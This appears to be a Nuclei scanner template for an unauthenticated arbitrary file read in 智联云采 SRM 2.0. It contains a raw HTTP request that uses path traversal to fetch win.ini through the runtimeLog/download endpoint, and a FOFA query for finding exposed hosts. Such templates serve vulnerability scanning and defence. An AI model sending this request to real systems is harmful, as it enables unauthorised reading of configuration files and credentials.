http:
    - matchers:
        - part: body
          type: word
          words:
            - ; for 16-bit app support
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - |
          GET /adpweb/static/%2e%2e;/a/sys/runtimeLog/download?path=c:\\windows\win.ini HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
id: zhilianyuncai-runtimeLog_download-File-reading
info:
    author: Superhero
    description: |-
        fofa: title=="SRM 2.0"
        智联云采 SRM2.0 runtimeLog/download 接口存在任意文件读取漏洞，未经身份验证攻击者可通过该漏洞读取系统重要文件（如数据库配置文件、系统配置文件）、数据库配置文件等等，导致网站处于极度不安全状态。
    name: 智联云采 SRM2.0 runtimeLog/download 任意文件读取漏洞
    reference:
        - https://mp.weixin.qq.com/s?__biz=MzkzMTcwMTg1Mg==&mid=2247486585&idx=1&sn=cb0e73248e17310c50f333948569d15f&chksm=c267b94af510305cc7e8dd1d7aec83c435800f097bfc39c0c87b7b1ebb5dfe79cadaaea4bb14&token=1628549949&lang=zh_CN#rd
    severity: high
    tags:
        - File reading
        - 智联云采 SRM2.0
